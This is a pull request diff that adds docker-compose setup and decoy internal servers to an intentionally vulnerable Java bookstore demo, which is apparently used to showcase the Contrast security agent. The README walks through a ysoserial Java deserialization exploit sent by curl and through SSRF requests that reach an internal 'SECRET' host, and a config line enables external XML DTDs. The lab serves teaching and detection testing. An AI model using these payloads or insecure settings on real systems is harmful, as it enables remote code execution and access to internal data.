### PR TITLE
Add docker-compose for convenience

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -28,3 +28,5 @@ target/
 
 # virtual machine crash logs, see http://www.java.com/en/download/help/error_hotspot.xml
 hs_err_pid*
+
+contrast_security-jonj.yaml

--- a/.gitignore
+++ b/.gitignore
@@ -29,4 +29,5 @@ target/
 # virtual machine crash logs, see http://www.java.com/en/download/help/error_hotspot.xml
 hs_err_pid*
 
-contrast_security-jonj.yaml
+contrast_security-*.yaml
+docker-compose-override.yml

--- a/PROD/info
+++ b/PROD/info
@@ -1,0 +1,1 @@
+This is info about PROD

--- a/README.md
+++ b/README.md
@@ -92,16 +92,22 @@ type.
 
 To exploit this, we must first make an exploit that creates a file in `/tmp` as a proof-of-concept:
 ```
-$ git clone ysoserial
-$ docker run ysoserial-bookstore CommonsCollections5 'touch /tmp/hacked' > commonscollections5.ser
+$ git clone https://github.com/frohoff/ysoserial
+$ cd ysoserial
+$ docker build -t ysoserial .
+$ docker run --rm -t ysoserial CommonsCollections5 'touch /tmp/hacked' > commonscollections5.ser
 ```
 
 Now you can send the exploit generated in the `commonscollections5.ser` file:
 ```
-$ curl -vv -X POST -H "Content-Type: application/octet-stream" --data-binary @commonscollections5.ser http://localhost:8001/update
+$ curl -X POST -H "Content-Type: application/octet-stream" --data-binary @commonscollections5.ser http://localhost:8001/update
 ```
 
-To prove that we created this `/tmp/hacked` file, we must shell into the running container. Let's get the ID:
+To prove that we created this `/tmp/hacked` file, we must shell into the running container. 
+
+If you started with docker-compose, the container ID is something like java-microservice-sample-apps_bookstore-datamanager_1.
+
+If you ran the containers manually, you can start with the ID:
 ```
 $ docker ps
 CONTAINER ID        IMAGE                    COMMAND                 CREATED              STATUS              PORTS                              NAMES
@@ -110,8 +116,7 @@ CONTAINER ID        IMAGE                    COMMAND                 CREATED    
 
 Now, using that container ID, we shell into the container and confirm the exploit created the `/tmp/hacked` file:
 ```
-$ docker exec -it 3729e1f30284 bash
-\# ls -al /tmp
+$ docker exec -it java-microservice-sample-apps_bookstore-datamanager_1 ls -al /tmp
 ...
 */tmp/hacked*
 ```

--- a/README.md
+++ b/README.md
@@ -34,7 +34,18 @@ The bookstore-debug app is a Dropwizard app that offers info to the devs:
 
 The first step is to start all 3 of the services, which will run on ports 8000, 8001 and 8002, respectively.
 
-Each service has a Dockerfile to make running 1 step. Consult each service's `README.md` to see the commands.
+To start normally:
+```
+$ docker-compose up
+```
+
+To start with Contrast enabled, first edit contrast_security.yaml with your agent credentials, then:
+```
+$ cp /path/to/contrast.jar .
+$ docker-compose -f docker-compose.yml -f docker-compose-contrast.yml up
+```
+
+If you don't want to use docker-compose, each service has a Dockerfile to make running 1 step. Consult each service's `README.md` to see the commands.
 
 ### Using the services
 
@@ -66,7 +77,7 @@ $ curl http://localhost:8000/debug
 ```
 
 ## Detecting the vulnerabilities
-To add the Java Agent to all the services above:
+To detect the vulnerabilities, start the apps with Contrast enabled as described above.  Then use the services to exercise the code.  It should not be necessary to exploit the vulnerabilities, in order for Contrast to identify the vulnerabilities.
 
 ## Exploiting the Vulnerabilities
 

--- a/README.md
+++ b/README.md
@@ -139,3 +139,7 @@ $ curl http://localhost:8002/application/info?env=google.com/?
 ```
 
 Obviously in this case we ask the server to retrieve Google content, but it could as easily be pointed towards URLs typically only accessed within your perimeter.
+
+```
+$ curl http://localhost:8002/application/info?env=SECRET
+```

--- a/README.md
+++ b/README.md
@@ -95,12 +95,12 @@ To exploit this, we must first make an exploit that creates a file in `/tmp` as 
 $ git clone https://github.com/frohoff/ysoserial
 $ cd ysoserial
 $ docker build -t ysoserial .
-$ docker run --rm -t ysoserial CommonsCollections5 'touch /tmp/hacked' > commonscollections5.ser
+$ docker run --rm ysoserial CommonsCollections5 '/usr/bin/touch /tmp/hacked' > commonscollections5.ser
 ```
 
 Now you can send the exploit generated in the `commonscollections5.ser` file:
 ```
-$ curl -X POST -H "Content-Type: application/octet-stream" --data-binary @commonscollections5.ser http://localhost:8001/update
+$ curl -X POST -H "Content-Type: application/octet-stream" --data-binary "@commonscollections5.ser" http://localhost:8001/update
 ```
 
 To prove that we created this `/tmp/hacked` file, we must shell into the running container. 
@@ -116,13 +116,13 @@ CONTAINER ID        IMAGE                    COMMAND                 CREATED    
 
 Now, using that container ID, we shell into the container and confirm the exploit created the `/tmp/hacked` file:
 ```
-$ docker exec -it java-microservice-sample-apps_bookstore-datamanager_1 ls -al /tmp
+$ docker exec -it java-microservice-sample-apps_bookstore-datamanager_1 ls -al /tmp/hacked
 ...
-*/tmp/hacked*
+-rw-r--r-- 1 root root 0 <time> /tmp/hacked
 ```
 
-### Same-Site Request Forgery (SSRF)
-The `bookstore-frontend` exposes a "info" service, only intended for developers. It is intended to be used to rertieve data about diffferent developer environments, but it can be used to force the app to retrieve data from other URLs:
+### Server Side Request Forgery (SSRF)
+The `bookstore-frontend` exposes a "info" service, only intended for developers. It is intended to be used to rertieve data about different developer environments, but it can be used to force the app to retrieve data from other URLs:
 ```
 $ curl http://localhost:8002/application/info?env=google.com/?
 ```

--- a/SECRET/info
+++ b/SECRET/info
@@ -1,0 +1,1 @@
+This is info that should only be accessible from the internal network

--- a/bookstore-data-manager/Dockerfile
+++ b/bookstore-data-manager/Dockerfile
@@ -4,5 +4,5 @@ WORKDIR /app
 COPY pom.xml .
 COPY src ./src
 
-EXPOSE 8000
+EXPOSE 8001
 ENTRYPOINT ["mvn","spring-boot:run"] 

--- a/bookstore-frontend/src/main/java/acme/frontend/ServicePaths.java
+++ b/bookstore-frontend/src/main/java/acme/frontend/ServicePaths.java
@@ -7,6 +7,10 @@ final class ServicePaths {
 
   private ServicePaths() { }
 
-  static String DEBUG_URL = "http://localhost:8002/application/";
-  static String DATA_MANAGER_URL = "http://localhost:8001/";
+  //static String DEBUG_URL = "http://localhost:8002/application/";
+  static String DEBUG_URL = "http://bookstore-devservice:8002/application/";
+
+
+  // static String DATA_MANAGER_URL = "http://localhost:8001/";
+  static String DATA_MANAGER_URL = "http://bookstore-datamanager:8001/";
 }

--- a/contrast_security.yaml
+++ b/contrast_security.yaml
@@ -1,0 +1,13 @@
+api: 
+  url: https://eval.contrastsecurity.com/Contrast/
+  service_key: 
+  api_key: 
+  user_name: 
+
+#agent:
+#  logger:
+#    level: debug
+
+server:
+  name: bookstore-server
+  environment: development

--- a/docker-compose-contrast.yml
+++ b/docker-compose-contrast.yml
@@ -1,0 +1,29 @@
+version: "3.0"
+services:
+  bookstore-datamanager:
+    volumes:
+      - "./contrast_security.yaml:/etc/contrast/java/contrast_security.yaml"
+      - "./contrast.jar:/tmp/contrast.jar"
+    environment:
+      - "CONTRAST__AGENT__JAVA__STANDALONE_APP_NAME=Bookstore Data Manager"
+      - "CONTRAST__AGENT__CONTRAST_WORKING_DIR=/tmp/contrast"
+      - "CONTRAST__AGENT__LOGGER__STDOUT=true"
+      - "JAVA_TOOL_OPTIONS=-javaagent:/tmp/contrast.jar"
+  bookstore-devservice:
+    volumes:
+      - "./contrast_security.yaml:/etc/contrast/java/contrast_security.yaml"
+      - "./contrast.jar:/tmp/contrast.jar"
+    environment:
+      - "CONTRAST__AGENT__JAVA__STANDALONE_APP_NAME=Bookstore Devservice"
+      - "CONTRAST__AGENT__CONTRAST_WORKING_DIR=/tmp/contrast"
+      - "CONTRAST__AGENT__LOGGER__STDOUT=true"
+      - "JAVA_TOOL_OPTIONS=-javaagent:/tmp/contrast.jar"
+  bookstore-frontend:
+    volumes:
+      - "./contrast_security.yaml:/etc/contrast/java/contrast_security.yaml"
+      - "./contrast.jar:/tmp/contrast.jar"
+    environment:
+      - "CONTRAST__AGENT__JAVA__STANDALONE_APP_NAME=Bookstore Front End"
+      - "CONTRAST__AGENT__CONTRAST_WORKING_DIR=/tmp/contrast"
+      - "CONTRAST__AGENT__LOGGER__STDOUT=true"
+      - "JAVA_TOOL_OPTIONS=-Djavax.xml.accessExternalDTD=all -javaagent:/tmp/contrast.jar"

--- a/docker-compose-contrast.yml
+++ b/docker-compose-contrast.yml
@@ -8,6 +8,7 @@ services:
       - "CONTRAST__AGENT__JAVA__STANDALONE_APP_NAME=Bookstore Data Manager"
       - "CONTRAST__AGENT__CONTRAST_WORKING_DIR=/tmp/contrast"
       - "CONTRAST__AGENT__LOGGER__STDOUT=true"
+      - "CONTRAST__SERVER__ENVIRONMENT=development"
       - "JAVA_TOOL_OPTIONS=-javaagent:/tmp/contrast.jar"
   bookstore-devservice:
     volumes:
@@ -17,6 +18,7 @@ services:
       - "CONTRAST__AGENT__JAVA__STANDALONE_APP_NAME=Bookstore Devservice"
       - "CONTRAST__AGENT__CONTRAST_WORKING_DIR=/tmp/contrast"
       - "CONTRAST__AGENT__LOGGER__STDOUT=true"
+      - "CONTRAST__SERVER__ENVIRONMENT=development"
       - "JAVA_TOOL_OPTIONS=-javaagent:/tmp/contrast.jar"
   bookstore-frontend:
     volumes:
@@ -26,4 +28,5 @@ services:
       - "CONTRAST__AGENT__JAVA__STANDALONE_APP_NAME=Bookstore Front End"
       - "CONTRAST__AGENT__CONTRAST_WORKING_DIR=/tmp/contrast"
       - "CONTRAST__AGENT__LOGGER__STDOUT=true"
+      - "CONTRAST__SERVER__ENVIRONMENT=development"
       - "JAVA_TOOL_OPTIONS=-Djavax.xml.accessExternalDTD=all -javaagent:/tmp/contrast.jar"

--- a/docker-compose.yml
+++ b/docker-compose.yml
@@ -1,0 +1,16 @@
+version: "3.0"
+services:
+  bookstore-datamanager:
+    build: ./bookstore-data-manager
+    ports:
+      - "8001:8001"
+  bookstore-devservice:
+    build: ./bookstore-devservice
+    ports:
+      - "8002:8002"
+  bookstore-frontend:
+    build: ./bookstore-frontend
+    ports:
+      - "8000:8000"
+    environment:
+      - "JAVA_TOOL_OPTIONS=-Djavax.xml.accessExternalDTD=all"

--- a/docker-compose.yml
+++ b/docker-compose.yml
@@ -4,13 +4,38 @@ services:
     build: ./bookstore-data-manager
     ports:
       - "8001:8001"
+    networks:
+      - sample-app
   bookstore-devservice:
     build: ./bookstore-devservice
     ports:
       - "8002:8002"
+    networks:
+      - sample-app
   bookstore-frontend:
     build: ./bookstore-frontend
     ports:
       - "8000:8000"
     environment:
       - "JAVA_TOOL_OPTIONS=-Djavax.xml.accessExternalDTD=all"
+    networks:
+      - sample-app
+  PROD:
+    image: nginx
+    volumes:
+      - "./PROD:/usr/share/nginx/html:ro"
+    networks:
+      sample-app:
+        aliases:
+          - PROD.acmedevinfo.local
+  SECRET:
+    image: nginx
+    volumes:
+      - "./SECRET:/usr/share/nginx/html:ro"
+    networks:
+      sample-app:
+        aliases:
+          - SECRET.acmedevinfo.local
+
+networks:
+  sample-app:


### PR DESCRIPTION
Added some docker-compose goodness, including options for enabling Contrast.  Changed to separate hostnames for the remote services rather than localhost, because Mac Docker doesn't route localhost to other containers.  Fleshed out a couple of bogus nginx servers for the /debug page.